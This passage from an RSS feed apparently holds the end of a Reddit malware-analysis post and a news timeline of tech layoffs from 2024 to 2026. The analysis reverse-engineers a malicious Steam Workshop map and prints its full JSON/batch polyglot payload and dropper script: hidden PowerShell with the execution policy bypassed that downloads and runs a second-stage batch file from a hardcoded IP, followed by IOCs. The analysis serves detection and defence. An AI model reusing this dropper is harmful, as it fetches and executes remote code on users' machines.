..... 1 powershell ............. 1 </code></pre> <p>These references are concentrated in a single Blueprint rather than being distributed throughout the package. There does not appear to be additional hidden logic elsewhere in the container, which makes the relevant behavior easier to isolate and analyze.</p> <p><strong>6): Reverse Engineering the Blueprint</strong></p> <p>The complete function chain is:</p> <pre><code>ReceiveBeginPlay ↓ GetPlatformUserDir ↓ Replace ↓ Concat_StrStr ↓ FromString (JSON) ↓ ToFile </code></pre> <p>Despite the Blueprint being named like an environment or lighting system, the logic does not appear to perform any lighting, ambience, or world-management functions. Instead, it constructs a file path and writes data to disk.</p> <p>Tracing the Blueprint bytecode shows the path construction:</p> <pre><code>dir = GetPlatformUserDir() // C:/Users/&lt;user&gt;/Documents/ path = dir + "s.bat" </code></pre> <p>ReceiveBeginPlay is normally called when the map begins loading, which does not fully match the behavior reported by some users, who observed activity during the download process itself. That discrepancy is not explained by the Blueprint logic alone, so it is worth treating those reports separately from the behavior confirmed through asset analysis.</p> <p><strong>7): Extracting the Embedded Payload</strong></p> <p>A single embedded string inside the Blueprint contains the following data:</p> <pre><code>{"x\"&amp;if not defined _Z (set _Z=1&amp;start /min cmd /c %~f0&amp;exit) else ( powershell -w hidden -ep bypass -c iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat; cmd /c $env:TEMP\s.bat&amp;exit)&amp;\"x":"1"} </code></pre> <p>The string is structured as a JSON/batch polyglot: it is valid JSON while also containing batch command syntax inside the JSON key. The command content is therefore preserved when written as JSON data, but can also be interpreted as a batch script if the resulting file is executed.</p> <p>This format is significant because the earlier Blueprint analysis showed that the file-writing step uses <code>ToFile</code>, which writes JSON data. The embedded content appears designed to satisfy that JSON requirement while retaining executable command syntax.</p> <p>The combination of a JSON-compatible wrapper and embedded command execution logic is not typical of normal Unreal Engine asset data and is a strong indicator that the content was deliberately constructed rather than being accidental or generated by the engine.</p> <p><strong>8): Analyzing the Dropper Script</strong></p> <p>The extracted script is also human-readable:</p> <pre><code>if not defined _Z ( set _Z=1 start /min cmd /c %~f0 exit ) else ( powershell -w hidden -ep bypass -c ^ iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat cmd /c $env:TEMP\s.bat exit ) </code></pre> <p>The script uses a simple two-stage execution flow.</p> <p>On the first run, <code>_Z</code> is not defined, so the script sets the variable, launches a minimized copy of itself, and exits. This relaunch behavior explains the brief command window flash reported by some users. At this stage, the script is acting as a launcher rather than performing the main action.</p> <p>On the second run, the <code>_Z</code> variable is already present, so the script follows the alternate branch. It starts PowerShell with a hidden window, modifies the execution policy for that process, downloads <code>steamb.bat</code> from a hardcoded external address, saves it to the temporary directory, and executes it.</p> <p>The <code>_Z</code> check appears to exist solely to prevent the script from repeatedly relaunching itself.</p> <p>The script itself is relatively simple: there is no evidence here of persistence mechanisms, privilege escalation, or sophisticated obfuscation. Its main purpose appears to be retrieving and executing a second-stage script. That second stage is hosted externally, meaning its contents can change independently of the original mod package.</p> <p><strong>9): Confirming Execution on an Affected PC</strong></p> <p>On one affected system, I found a file that was byte-for-byte identical to the payload string embedded in the Blueprint. It was located at the exact path identified during the bytecode analysis.</p> <p>This confirms that the Blueprint logic was not just theoretical, the file-writing behavior observed during reverse engineering occurred on a real system.</p> <p><a href="https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32">https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32</a></p> <p><strong>10): Did the second stage execute?</strong></p> <p>The second-stage file, <code>%TEMP%\s.bat</code>, was not present on the affected machine. The PowerShell Operational log explains why:</p> <p><a href="https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70">https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70</a></p> <p>The download request failed with an HTTP 404 response at the time of execution. Because the file was never successfully retrieved, nothing was written to disk and the following <code>cmd /c</code> command had no script to execute.</p> <p>On this system, the second stage did not execute. The contents and behavior of the downloaded payload remain unknown because the external file was unavailable at the time of analysis.</p> <p>The address embedded in the script resolves to <code>31.57.34.228</code>. At the time of analysis, the IP address was geolocated to Amsterdam, Netherlands, and was associated with Blockchain Creek B.V. (ASN 207994).</p> <p>This information identifies the hosting infrastructure used by the download URL, but it does not by itself identify the operator of the server or establish attribution. The important finding is that the Blueprint attempted to retrieve an additional payload from an external location, rather than containing the final payload entirely within the workshop files.</p> <p><a href="https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026">https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026</a></p> <p><strong>11): Analysis Summary</strong></p> <p>Based on the evidence recovered from the workshop item, this should be treated as malicious content. That conclusion does not rely on a single indicator; it comes from the combination of several independent findings:</p> <ul> <li>The Workshop uploader account appears to have been created only about one week before the item was published</li> <li>The Workshop map currently does not allow users to leave comments or ratings</li> <li>The only Blueprint containing custom logic was originally identified as <code>BP_RCE_Test</code> and later appeared under a name consistent with a harmless environment or lighting controller.</li> <li>The Blueprint executes automatically through <code>ReceiveBeginPlay</code>, rather than requiring an intentional user action inside the map.</li> <li>Its logic writes data outside the game directory into the user’s Documents folder, which is unrelated to normal map or asset behavior.</li> <li>The written content is a deliberately structured JSON/batch polyglot, allowing data written through a JSON-only function to retain executable batch syntax.</li> <li>That script launches hidden PowerShell, bypasses the local execution policy for the process, retrieves a second-stage file from a hardcoded external address, and attempts to execute it.</li> </ul> <p>What remains unknown is the purpose of the final payload. The second-stage script was not successfully retrieved during analysis and was no longer available from the remote location, so its behavior cannot be determined. Claims that it was specifically an infostealer, loader, or another type of malware would be speculation without that payload.</p> <p><strong>12): Limitations &amp; Unknowns</strong></p> <p><strong>What does</strong> <code>steamb.bat</code> <strong>do?</strong></p> <p>Unknown. The second-stage payload was not delivered during analysis, so its final behavior cannot be determined from the available evidence.</p> <h1>IOCs</h1> <pre><code>Workshop item 3765145606 "Laser Tag Neon" (appid 4704690) comments and ratings disabled on the listing uploader account roughly one week old Asset BP_AmbientController.uasset (originally BP_RCE_Test_C_0) Dropped file %USERPROFILE%\Documents\s.bat C2 http://31.57.34.228/work/steamb.bat Second stage steamb.bat (never delivered, contents unknown) Asset build 2026-06-09 22:37:14 s.bat 210 bytes sha256 1ff540bc3c493a93059e602b414ba61027ed1a2b8a079f6197b0718f4a2101b6 md5 04d6dfadd5248c995951707e27520ade container utoc aea429fbb44d552c917c22018e838e4154e68a8cac5806f7a8e30b61586ba2a6 ucas fbd932faba4ec8d614fbd7a68636e177213259bafe2babdcdc47c2a8acd6d569 pak aa58f9061a4e39e3f5a28395c56cfa5b0072d90e66054894f9c8022e81e396c9 </code></pre> <p><strong>Final Verdict</strong></p> <p>Based on everything I found, I believe this workshop item is very likely malicious, but there are still parts of the execution chain I couldn't directly observe.</p> <p>What I can say with confidence is that the asset contains a Blueprint whose only meaningful purpose is to write a batch file outside the game's directory into the user's Documents folder. That batch file then attempts to launch PowerShell with the execution policy bypassed, download a second batch file from a hard-coded external server, and execute it.</p> <p>I can't think of a legitimate reason for a Steam workshop map to write a .bat file into a user's Documents folder and then use PowerShell to fetch and run another <code>.bat</code> file from the Internet. Even without knowing what the second stage contained, that behavior is extremely difficult to explain as anything other than a malware delivery chain.</p> <p>Could there be some edge case I'm missing? Absolutely. That's why I've tried to separate facts from assumptions throughout this write-up. But given the evidence recovered from the assets themselves, I think calling this a malicious dropper is the conclusion best supported by the data</p> <p>Further independent investigation is encouraged, particularly if additional evidence becomes available. For now, the workshop item and the uploader have been reported and flagged for review.</p> <p>Cheers and stay safe!</p> <p>FeintBe</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/feintbe"> /u/feintbe </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tech layoffs: A 2026 timeline]]></title>
<description><![CDATA[Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented ev...]]></description>
<link>https://tsecurity.de/de/3689055/it-nachrichten/tech-layoffs-a-2026-timeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689055/it-nachrichten/tech-layoffs-a-2026-timeline/</guid>
<pubDate>Thu, 23 Jul 2026 14:35:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented even by companies reporting strong financial performance.</p>



<p class="wp-block-paragraph">But it’s not just AI leading to workforce cuts. Complementing this technological shift are ongoing economic uncertainty, inflation, and higher interest rates, compounded by a chip shortage and rising energy costs. This mix is driving companies to cut costs and streamline operations for increased efficiency.</p>



<p class="wp-block-paragraph">According to data compiled by <a href="https://layoffs.fyi/" target="_blank" rel="noreferrer noopener">Layoffs.fyi</a>, an online tracker that keep tabs on job losses in the technology sector, 123,941 tech employees were laid off at 269 companies in 2025. The site also reports that 71,981 government employees were laid off by DOGE alone, with 182,528 total federal workers laid off.</p>



<p class="wp-block-paragraph">Here is a list — to be updated regularly — of some of the most prominent technology layoffs the industry has experienced recently.</p>



<h2 class="wp-block-heading">Notable tech layoffs in 2026</h2>



<ul class="wp-block-list">
<li>Monday.com</li>



<li>Microsoft</li>



<li>Meta</li>



<li>Cisco</li>



<li>Cloudflare</li>



<li>Oracle</li>



<li>Atlassian </li>



<li>Salesforce</li>



<li>Amazon</li>



<li>Ericsson</li>
</ul>



<h3 class="wp-block-heading">July 22, 2026: Monday.com cuts 20% of its workforce to restructure for the AI era</h3>



<p class="wp-block-paragraph">The company says the decision to <a href="https://www.computerworld.com/article/4200349/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era-2.html">cut 620 jobs</a> isn’t about margins, but about creating a flatter organization built around AI agents, autonomous teams, and deeper customer engagement.</p>



<h3 class="wp-block-heading">July 6, 2026: Microsoft cuts 4,800 jobs, primarily in sales and Xbox teams</h3>



<p class="wp-block-paragraph">As the company <a href="https://www.computerworld.com/article/4193532/microsoft-bets-that-enterprise-ai-needs-engineers-not-bigger-sales-teams-2.html" target="_blank">trims thousands of jobs</a>, it’s also investing in embedded engineering teams and AI infrastructure. The layoffs come several weeks after the company offered 8,750 US employees <a href="https://www.computerworld.com/article/4163188/microsoft-to-offer-voluntary-retirement-buyouts-to-about-7-of-the-us-workforce.html">voluntary retirement buyouts</a>.</p>



<h3 class="wp-block-heading">June 5, 2026: Tech industry cut 38,242 jobs in May, worst since 2024</h3>



<p class="wp-block-paragraph">AI was blamed for 40% of <a href="https://www.computerworld.com/article/4181822/tech-industry-cut-38242-jobs-in-may-worst-since-2024.html">the job cuts in May</a>, up from 7% in January, according to research by employment placement company Challenger, Gray &amp; Christmas.</p>



<h3 class="wp-block-heading">May 20, 2026: Meta cuts 8,000 jobs, around 10% of workforce</h3>



<p class="wp-block-paragraph">The cuts are expected to expected to hit Meta’s engineering and product teams the hardest, arriving as Meta pivots toward AI to boost efficiency across its organization, <a href="https://tech.yahoo.com/general/article/meta-starts-cutting-8000-jobs-as-part-of-previously-announced-layoffs-145220586.html" target="_blank" rel="noreferrer noopener">according to Yahoo Tech</a>.</p>



<h3 class="wp-block-heading">May 13, 2026: Cisco to cut nearly 4,000 jobs despite strong growth in AI, enterprise networking</h3>



<p class="wp-block-paragraph">Despite reporting positive financial news — including record third-quarter revenue of $15.8 billion, a 12% year-over-year increase — Cisco said it will <a href="https://www.networkworld.com/article/4171043/cisco-to-cut-nearly-4000-jobs-despite-strong-growth-in-ai-enterprise-networking.html" target="_blank">eliminate almost 4,000 jobs</a>.</p>



<h3 class="wp-block-heading">May 7, 2026: Cloudflare to cut 1,100 jobs in AI-focused restructuring</h3>



<p class="wp-block-paragraph">About <a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-cut-over-1-100-204726989.html" target="_blank" rel="noreferrer noopener">20% of Cloudflare’s global workforce will be culled</a> as the company pivots for the agentic AI era, Reuters reported.</p>



<h3 class="wp-block-heading">April 1, 2026: Oracle to cut up to 30,000 jobs globally, putting enterprise support and roadmaps at risk</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4153113/oracle-cuts-up-to-30000-jobs-globally-putting-enterprise-support-and-roadmaps-at-risk.html">Oracle began laying off employees</a> on March 31 in what could be the largest workforce reduction in the company’s history. Employees received termination emails at 6 a.m. local time with immediate system lockouts and no prior warning. <em>(Note: in June, CNBC put the <a href="https://www.cnbc.com/2026/06/23/oracle-ai-job-cuts-layoffs-21000.html" target="_blank" rel="noreferrer noopener">final layoff tally at 21,000</a>.)</em></p>



<h3 class="wp-block-heading">March 12, 2026: Atlassian cuts 1,600 jobs to fund AI and enterprise expansion</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4144218/atlassian-cuts-1600-jobs-to-fund-ai-and-enterprise-expansion.html">Atlassian will reduce its global workforce</a> by approximately 10%, eliminating around 1,600 roles, as the collaboration software maker redirects capital toward artificial intelligence development and enterprise sales.</p>



<h3 class="wp-block-heading">March 11, 2026: Tech layoffs surpass 45,000 in early 2026</h3>



<p class="wp-block-paragraph">A recent analysis by RationalFX found 45,363 job cuts globally so far this year—with roughly 68% or more than 30,000 occurring in the U.S. — highlighting ongoing <a href="https://www.networkworld.com/article/4143749/tech-layoffs-surpass-45000-in-early-2026.html" target="_blank">workforce cuts even as many tech companies report strong revenue growth</a>.</p>



<h3 class="wp-block-heading">February 10, 2026: Salesforce lays off staffers as executive leadership churn continues</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4130028/salesforce-lays-off-staffers-as-executive-leadership-churn-continues.html" target="_blank">Salesforce has reduced close to 1,000 roles</a> earlier this month across teams, including marketing, product management, data analytics, and its <a href="https://www.cio.com/article/4011936/salesforce-agentforce-3-promises-new-ways-to-monitor-and-manage-ai-agents.html">Agentforce</a> AI unit, <a href="https://www.businessinsider.com/salesforce-cuts-jobs-executive-changes-2026-2">Business Insider</a> reported, quoting employees familiar with the matter.</p>



<h3 class="wp-block-heading">January 23, 2026: Amazon layoffs expected to disproportionately hit AWS and tech talent</h3>



<p class="wp-block-paragraph">As the market slows down, <a href="https://www.computerworld.com/article/4121653/amazon-layoffs-expected-to-disproportionately-hit-aws-and-tech-talent.html">AWS and other Amazon units are preparing for another round of layoffs</a>, which is expected to overwhelmingly impact tech talent. An email from HR leader Beth Galetti on Jan. 28 <a href="https://www.computerworld.com/article/4123477/amazon-confirms-16000-job-cuts-including-to-aws.html">confirmed 16,000 job cuts</a>.</p>



<h3 class="wp-block-heading">January 15, 2026: Ericsson plans to shed 1,600 jobs in Sweden</h3>



<p class="wp-block-paragraph"> Ericsson lans to cut some 1,600 jobs in Sweden, the telecommunications equipment maker said doubling down on recent cost-saving measures that have helped it weather a prolonged downturn in telecoms spending, <a href="https://www.reuters.com/business/world-at-work/ericsson-shed-1600-jobs-sweden-2026-01-15/" target="_blank" rel="noreferrer noopener">Reuters reports</a>.</p>



<h3 class="wp-block-heading">January 13, 2026: Meta plans to cut around 10% of employees in Reality Labs business</h3>



<p class="wp-block-paragraph">Meta plans to cut around 10% of the employees in its Reality Labs division who work on products including the metaverse, according to three people with knowledge of the discussions, <a href="http://meta%20plans%20to%20cut%20around%2010%25%20of%20employees%20in%20reality%20labs%20business/" target="_blank" rel="noreferrer noopener">according to The New York Times</a>.</p>



<h2 class="wp-block-heading">Layoffs in 2025</h2>



<ul class="wp-block-list">
<li>Cisco</li>



<li>Oracle</li>



<li>Windsurf</li>



<li>Intel</li>



<li>Microsoft</li>



<li>Crowdstrike</li>



<li>HPE</li>



<li>Autodesk</li>



<li>HPE</li>



<li>CISA</li>



<li>Workday</li>



<li>Salesforce</li>



<li>Meta</li>
</ul>



<h3 class="wp-block-heading">Global tech-sector layoffs surpass 244,000 in 2025</h3>



<p class="wp-block-paragraph">Economic uncertainty, elevated interest rates, and AI adoption have <a href="https://www.networkworld.com/article/4114572/global-tech-sector-layoffs-surpass-244000-in-2025.html" target="_blank">driven workforce reductions across tech companies worldwide</a>, according to a RationalFX report.</p>



<h3 class="wp-block-heading">October 28, 2025: Amazon to cut 14,000 jobs across company</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4080142/amazon-to-cut-14000-jobs-across-company.html">Amazon will reduce its overall workforce</a> by 14,000, cutting layers of management across the company and hiring in some areas to support its “biggest bets”.</p>



<h3 class="wp-block-heading">August 18, 2025: Cisco and Oracle to cut hundreds of Bay Area jobs</h3>



<p class="wp-block-paragraph">Tech companies Cisco and Oracle are <a href="https://www.sfchronicle.com/tech/article/cisco-oracle-layoffs-bay-area-20824135.php" target="_blank" rel="noreferrer noopener">cutting hundreds of jobs across the Bay Area</a>. Cisco will eliminate 221 positions at its Milpitas and San Francisco offices, effective Oct. 13. Oracle is reducing 101 positions in Santa Clara on the same date </p>



<h3 class="wp-block-heading">August 5, 2025: 3 weeks after acquiring Windsurf, Cognition offers staff the exit door</h3>



<p class="wp-block-paragraph">Cognition, the AI coding startup that acquired rival company Windsurf three weeks ago, laid off 30 employees last week and is offering buyouts to the roughly 200 remaining employees on the team, <a href="https://www.theinformation.com/articles/cognition-offers-buyouts-newly-acquired-windsurf-staff" target="_blank" rel="noreferrer noopener">reports The Information</a>.</p>



<h3 class="wp-block-heading">July 25, 2025, Intel to lay off 22% of workforce, CEO Tan signals ‘no more blank checks’</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4028896/intel-to-lay-off-22-of-workforce-as-ceo-tan-signals-no-more-blank-checks.html">Intel will reduce its workforce to 75,000 employees</a> by the end of 2025 as new CEO Lip-Bu Tan implements sweeping changes designed to transform the struggling chipmaker</p>



<h3 class="wp-block-heading">July 8, 2025, Intel layoffs begin: Chipmaker is cutting many thousands of jobs</h3>



<p class="wp-block-paragraph">Intel has begun laying off employees across the company. CEO Lip-Bu Tan told workers back in April to expect <a href="https://www.oregonlive.com/silicon-forest/2025/07/intel-layoffs-begin-chipmaker-is-cutting-many-thousands-of-jobs.html">major layoffs at Intel </a>in the coming months as the chipmaker slashes costs and overhauls its organization after years of technical setbacks and falling sales. </p>



<h3 class="wp-block-heading">July 2, 2025: Microsoft will cut 9,000 workers</h3>



<p class="wp-block-paragraph">Microsoft will lay off about 9,000 employees, a source familiar with the workforce cut <a href="https://www.nbcnews.com/business/business-news/microsoft-laying-9000-employees-latest-cuts-rcna216553">told CNBC</a>.  The cuts will reportedly affect less than 4% of Microsoft’s global workforce and will impact different teams, geographies and levels of experience. This is the latest in a string of cuts the tech giant has made this year.</p>



<h3 class="wp-block-heading">June 17, 2025: Intel looks to factory layoffs to return to profitability</h3>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4008670/can-intel-cut-its-way-to-profit-with-factory-layoffs.html">Intel will lay off up to 20% of its manufacturing sector employees</a> starting in July,  according to media reports, as the company looks for options as it seeks a return to profitability. The cuts reportedly will be made around the world, but some of the layoffs will be closer to home, according to a report in The Oregonian citing an internal company memo from Intel manufacturing Vice President Naga Chandrasekaran.</p>



<h3 class="wp-block-heading">May 7, 2025: CrowdStrike to lay off 5% of staff</h3>



<p class="wp-block-paragraph"><a href="https://www.reuters.com/sustainability/crowdstrike-lay-off-5-staff-reaffirms-forecasts-2025-05-07/">CrowdStrike announced a plan to cut about 500 roles</a>, roughly 5% of its workforce, to streamline operations and reduce costs. The cybersecurity company will incur about $36 million to $53 million in charges related to the layoffs</p>



<h3 class="wp-block-heading">March 6, 2025: HPE cuts 2,500 jobs, remains committed to Juniper buy</h3>



<p class="wp-block-paragraph">CEO Antonio Neri told Wall Street analysts that <a href="https://www.networkworld.com/article/3840596/hpe-cuts-2500-workers-expects-juniper-buy-to-close-end-of-25-faces-tariff-issues.html">HPE would begin implementing a cost-cutting program involving layoffs </a>of about 2,500 employees over the next 18 months. HPE employs about 61,000 people worldwide.</p>



<h3 class="wp-block-heading">Feb. 27, 2025: Autodesk to lay off 9% of workforce</h3>



<p class="wp-block-paragraph">Software maker Autodesk is laying off 1,350 staff. With the rise of subscription and multi-year contracts billed annually, and self-service enablement, it finds it needs fewer sales staff, <a href="https://adsknews.autodesk.com/en/news/022725-employee-message/">CEO Andrew Anagnost said in a message to employees</a>. And with its cloud, platform, and AI products proving most profitable, it’s concentrating its staff and investments there. </p>



<h3 class="wp-block-heading">Feb. 27, 2025: HP to lay off 2,000 more</h3>



<p class="wp-block-paragraph">As part of an ongoing restructuring, HP plans to lay off up to another 2,000 workers. In recent weeks, the company has tried — unsuccessfully — to do away with telephone support staff by <a href="https://www.pcworld.com/article/2617767/hp-forced-callers-to-wait-15-minutes-before-connecting-to-support-staff.html">forcing callers to wait for at least 15 minutes</a> if they refuse to use self-service support resources online. The company swiftly backtracked, but wider job cuts are still on. </p>



<h3 class="wp-block-heading">Feb. 21, 2025: <a href="https://www.csoonline.com/article/3829710/firing-of-130-cisa-staff-worries-cybersecurity-industry.html">CISA lays off 130</a></h3>



<p class="wp-block-paragraph">Government employees get laid off too: In this case, 130 workers at the US Cybersecurity and Infrastructure Security Agency are being shown the door as a result of a DOGE decision. Cybersecurity experts are concerned that the cuts will harm the international collaborations that CISA has fostered, quite apart from their concerns about the security of the DOGE layoff process itself.</p>



<h3 class="wp-block-heading">Feb. 5, 2025: <a href="https://www.computerworld.com/article/3817887/workday-to-cut-1750-jobs-shift-focus-to-ai-and-global-expansion.html">Workday lays off 1,750</a></h3>



<p class="wp-block-paragraph">As it moves to invest more in AI and international growth, Workday is laying off 8.5% of its workforce and disposing of unused office space. Some analysts fear the cutbacks will affect the company’s customer service — unless AI can pick up the slack.</p>



<h3 class="wp-block-heading">Feb. 4, 2025: Salesforce lays off over 1,000</h3>



<p class="wp-block-paragraph">At the same time as it’s hiring sales staff for its new artificial intelligence products, Salesforce is laying off over 1,000 workers across the company, according to Bloomberg. As of June, 2024, the company had over 72,000 employees, according to its website. Salesforce did not comment on the report. In 2024 the company reportedly laid off around 1,000 staff too, in two waves: January and July.</p>



<h3 class="wp-block-heading">Jan. 14, 2025: Meta will lay off 5% of workforce</h3>



<p class="wp-block-paragraph">Mark Zuckerberg told Meta employees he intended to “move out the low performers faster” in an internal memo reported by Bloomberg. The memo announced that the company will lay off 5% of its staff, or around 3,600 staff, beginning Feb. 10. The company had already reduced its headcount by 5% in 2024 through natural attrition, the memo said. Among those leaving the company will be staff previously responsible for fact checking of posts on its social media platforms in the US, as the company begins relying on its users to police content.</p>



<h2 class="wp-block-heading">Tech layoffs in 2024</h2>



<ul class="wp-block-list">
<li>Equinix</li>



<li>AMD</li>



<li>Freshworks</li>



<li>Cisco</li>



<li>General Motors</li>



<li>Intel</li>



<li>OpenText</li>



<li>Microsoft</li>



<li>AWS</li>



<li>Dell</li>
</ul>



<h3 class="wp-block-heading">Nov. 26, 2024: <a href="https://www.networkworld.com/article/3613399/equinix-to-cut-3-of-staff-amidst-the-greatest-demand-for-data-center-infrastructure-ever.html">Equinix to cut 3% of staff</a></h3>



<p class="wp-block-paragraph">Despite intense demand for its data center capacity, Equinix is planning to lay off 3% of its workforce, or around 400 employees. The announcement followed the appointment of Adaire Fox-Martin to replace Charles Meyers as CEO and the departures of two other senior executives, CIO Milind Wagle and CISO Michael Montoya.</p>



<h3 class="wp-block-heading">Nov. 13, 2024: <a href="https://www.networkworld.com/article/3605016/amd-to-cut-4-of-workforce-to-prioritize-ai-chip-expansion-to-rival-nvidia.html#:~:text=Workforce%20reduction%20comes%20amid%20strong,shift%20in%20focus%20toward%20AI.&amp;text=Advanced%20Micro%20Devices%20(AMD)%20is,Nvidia's%20lead%20in%20the%20sector.">AMD to cut 4% of workforce</a></h3>



<p class="wp-block-paragraph">AMD will lay off around 1,000 employees as it pivots towards developing AI-focused chips, it said. The move came as a surprise to staff, as the company also reported strong quarterly earnings. </p>



<h3 class="wp-block-heading">Nov. 7, 2024: <a href="https://www.cio.com/article/3601088/freshworks-lays-off-660-about-13-percent-of-its-global-workforce-despite-strong-earnings-profits.html">Freshworks lays off 660</a></h3>



<p class="wp-block-paragraph">Enterprise software vendor Freshworks laid off around 660 staff, or around 13% of its headcount, despite reporting increased revenue and profits in its fourth fiscal quarter. The company described the layoffs as a realignment of its global workforce.</p>



<h3 class="wp-block-heading">Sept. 17, 2024: <a href="https://www.networkworld.com/article/3486901/cisco-to-cut-7-of-workforce-restructure-product-groups.html">Cisco lays off 6,000</a></h3>



<p class="wp-block-paragraph">After laying off around 4,200 staff in February, Cisco is at it again, laying off another 6,000 or around 7% of its workforce. Among the divisions affected were its threat intelligence unit, Talos Security. </p>



<h3 class="wp-block-heading">Aug. 20, 2024: <a href="https://www.cio.com/article/3489323/gm-software-layoffs-could-signal-a-shift-in-digital-transformation-strategy.html">General Motors lays off 1,000 software staff</a></h3>



<p class="wp-block-paragraph">More than 1,000 software and services staff are on the way out at General Motors, signalling that it could be rethinking its digital transformation strategy. In an internal memo, the company said that it was moving resources to its highest-priority work and flattening hierarchies.</p>



<h3 class="wp-block-heading">August 1, 2024: <a href="https://www.computerworld.com/article/3480715/intel-fires-15000-employees-as-it-intensifies-focus-on-ai.html">Intel removes 15,000 roles</a></h3>



<p class="wp-block-paragraph">Intel plans to cut its workforce by around 15% to reduce costs after a disastrous second quarter. Revenue for the three months to June 29 stagnated at around $12.8 billion, but net income fell 85% to $83 million, prompting CEO Pat Gelsinger to bring forward a company-wide meeting in order to announce that 15,000 staff would lose their jobs. “This is an incredibly hard day for Intel as we are making some of the most consequential changes in our company’s history,” Gelsinger wrote in an email to staff, continuing: “Our revenues have not grown as expected — and we’ve yet to fully benefit from powerful trends, like AI. Our costs are too high, our margins are too low. We need bolder actions to address both — particularly given our financial results and outlook for the second half of 2024, which is tougher than previously expected.”</p>



<h3 class="wp-block-heading">July 4, 2024: <a href="https://www.computerworld.es/article/2513686/opentext-despedira-a-cerca-de-1-200-empleados.html">OpenText to lay off 1,200</a></h3>



<p class="wp-block-paragraph">OpenText said it will lay off 1,200 staff, or about 1.7% of its workforce, in a bid to save around $100 million annually. It plans to hire new sales and engineering staff in other areas in 2025, it said.</p>



<h3 class="wp-block-heading">June 4, 2024: <a href="https://www.networkworld.com/article/2138075/microsoft-lays-off-staffers-from-its-azure-division.html">Microsoft lays off staff in Azure division</a></h3>



<p class="wp-block-paragraph">Microsoft laid off staff in several teams supporting its cloud services, including Azure for Operations and Mission Engineering. The company didn’t say exactly how many staff were leaving.</p>



<h3 class="wp-block-heading">April 4, 2024: <a href="https://www.cio.com/article/2081437/amazon-downsizes-aws-in-a-fresh-cost-cutting-round.html">Amazon downsizes AWS</a> in a fresh cost-cutting round</h3>



<p class="wp-block-paragraph">Amazon announced hundreds of layoffs in the sales and marketing teams of its AWS cloud services division — and also in the technology development teams for its physical retail stores, as it stepped back from efforts to generalize the “<a href="https://www.cio.com/article/2079910/amazon-drops-just-walk-out-technology-at-its-us-retail-locations.html">Just Walk Out</a>” technology built for its Amazon Fresh grocery stores. </p>



<h3 class="wp-block-heading">April 1, 2024: <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">Dell acknowledges 13,000 job cuts</a></h3>



<p class="wp-block-paragraph">Dell Technologies’ <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">latest 10K filing with the US Securities and Exchange Commission</a> disclosed that the company had laid off 13,000 employees over the course of the 2023 fiscal year; it characterized the layoffs and other reorganizational moves as cost-cutting measures. “These actions resulted in a reduction in our overall headcount,” the company said. A comparison to the previous year’s 10K filing, performed by The Register, found that Dell employed 133,000 people at that point, compared to 120,000 as of February 2024. Dell announced layoffs of 6,650 staffers on Feb. 6, but it is unclear whether those cuts were reflected in the numbers from this year’s 10K statement.</p>



<p class="wp-block-paragraph"><em><a href="https://www.computerworld.com/article/3816662/tech-layoffs-in-2024-a-timeline.html">See news of earlier layoffs.</a></em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Thu, 23 Jul 2026 14:05:04 +0200</pubDate>
